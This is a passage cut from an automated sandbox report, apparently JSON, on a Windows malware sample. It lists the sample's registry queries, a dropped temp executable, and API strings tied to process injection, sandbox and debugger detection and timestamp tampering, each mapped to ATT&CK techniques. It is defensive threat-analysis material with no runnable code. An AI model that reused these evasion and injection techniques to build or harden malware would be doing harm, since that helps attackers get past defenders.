PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to touch file \"c:\\jkzenugp\\0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to touch file \"c:\\cbwvqpkjed0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to touch file \"C:\\Windows\\System32\\fltLib.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"C:\\0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe.Local\\\"\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\gegdsimsogm.exe:Zone.Identifier\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"gegdsimsogm.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\gegdsimsogm.exe]- [targetUID: 00000000-00005952]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" writes file \"%temp%\\gegdsimsogm.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"0EF46F3686F60E1B6801FB27D2CB316597F31B59D79FD77E8685C1999B5F32BC\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Able to identify virtual/sandbox environment\n Matched sigs: Contains ability to detect sandbox (imports API)\n Matched sigs: Able to identify virtual environment by using user activity (API string)\n Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)\n Matched sigs: Contains ability to retrieve the time elapsed since the system was started (API string)", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-192", "type": 2, "relevance": 1, "name": "Contains ability to modify system service (API string)", "description": "Found reference to API \"ChangeServiceConfigA\" (Indicator: \"ChangeServiceConfig\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"ChangeServiceConfigA\" (Indicator: \"ChangeServiceConfig\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-409", "type": 2, "relevance": 1, "name": "Contains ability to set file time (API string)", "description": "Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-160", "type": 2, "relevance": 1, "name": "Contains ability to perform remote procedure calls (API string)", "description": "Found reference to API \"RpcStringFreeA\" (Indicator: \"RpcStringFree\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")", "origin": "File/Memory", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-148", "type": 2, "relevance": 1, "name": "Contains ability to register a top-level exception handler (API string)", "description": "Found reference to API \"UnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-201", "type": 2, "relevance": 1, "name": "Contains ability to query system locale (API string)", "description": "Found reference to API \"GetLocaleInfoA\" (Indicator: \"GetLocaleInfo\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetLocaleInfoA\" (Indicator: \"GetLocaleInfo\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetLocaleInfoA\" (Indicator: \"GetLocaleInfo\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"SystemTimeToFileTime\" (Indicator: \"SystemTimeToFileTime\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"SystemTimeToFileTime\" (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"EnumWindows\" (Indicator: \"EnumWindows\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"EnumWindows\" (Indicator: \"EnumWindows\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-162", "type": 2, "relevance": 1, "name": "Contains ability to retrieve volume information (API string)", "description": "Found reference to API \"GetVolumeInformationA\" (Indicator: \"GetVolumeInformation\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetVolumeInformationA\" (Indicator: \"GetVolumeInformation\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-312", "type": 2, "relevance": 1, "name": "Contains ability to retrieve path in which Windows is installed (API string)", "description": "Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-660", "type": 2, "relevance": 1, "name": "Able to identify virtual/sandbox environment", "description": "Found string \"vboxguestadditions\" (Indicator: \"VBoxGuest\"; Source: \"00000000-00005952.00000003.75415.001C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-89", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about the current system (API string)", "description": "Found reference to API \"GetSystemInfo\" (Indicator: \"GetSystemInfo\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetUserObjectInformationA\" (Indicator: \"GetUserObjectInformation\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetNativeSystemInfo\" (Indicator: \"GetNativeSystemInfo\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetUserObjectInformationA\" (Indicator: \"GetUserObjectInformation\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API 